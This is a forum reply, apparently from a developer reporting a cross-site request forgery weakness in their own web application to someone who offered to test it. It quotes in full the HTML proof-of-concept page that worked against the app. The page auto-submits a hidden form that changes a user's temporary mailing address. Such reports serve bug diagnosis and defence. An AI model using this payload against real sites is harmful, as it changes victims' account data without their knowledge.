Alexandre Machado Wrote:I'll test it and let you know, although I don't have any details of your application....
The following is taken from the html page that successfully "attacked" my application. Notice the FormID is a made up value (abc123). When this page was loaded in another tab in the browser while my application was running it successfully updated the page in my application. I look forward to your test results. Thank you.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form name="csrf_request" action="
https://www.website.com/ISAPI.dll/$/" method="POST"> <input type="hidden" name="TXTADDR1" value="456 Fake St" />
<input type="hidden" name="TXTADDR2" value="" />
<input type="hidden" name="TXTADDR3" value="" /> <input type="hidden" name="TXTCITY" value="Anytown" /> <input type="hidden" name="TXTZIPCODE" value="53221" />
<input type="hidden" name="CBXFOREIGNADDR_CHECKBOX" value="off" />
<input type="hidden" name="TXTCOUNTRY" value="" /> <input type="hidden" name="TXTSTATE" value="WI" /> <input type="hidden" name="TXTBEGINDATE" value="12/27/2019" />
<input type="hidden" name="TXTENDDATE" value="12/28/2019" />
<input type="hidden" name="CMBLETTERDELIVERY" value="3" />
<input type="hidden" name="TXTFAX" value="" />
<input type="hidden" name="TXTEMAIL" value="" />
<input type="hidden" name="TXTASF" value="" />
<input type="hidden" name="BTTNASFCHANGE" value="" />
<input type="hidden" name="CMDUPDATE" value="" />
<input type="hidden" name="CMDCANCEL" value="" />
<input type="hidden" name="CMDELECTRONICDELIVERY" value="" />
<input type="hidden" name="CMDADDRESSUPDATE" value="" />
<input type="hidden" name="IW_FormName" value="frmTempAddrUpdate" />
<input type="hidden" name="IW_FormClass" value="TfrmTempAddrUpdate" />
<input type="hidden" name="IW_FormID_" value="abc123" />
<input type="hidden" name="IW_width" value="781" />
<input type="hidden" name="IW_height" value="739" />
<input type="hidden" name="IW_Action" value="CMDUPDATE" />
<input type="hidden" name="IW_ActionParam" value="" />
</form>
<script>csrf_request.submit()</script>
</body>
</html>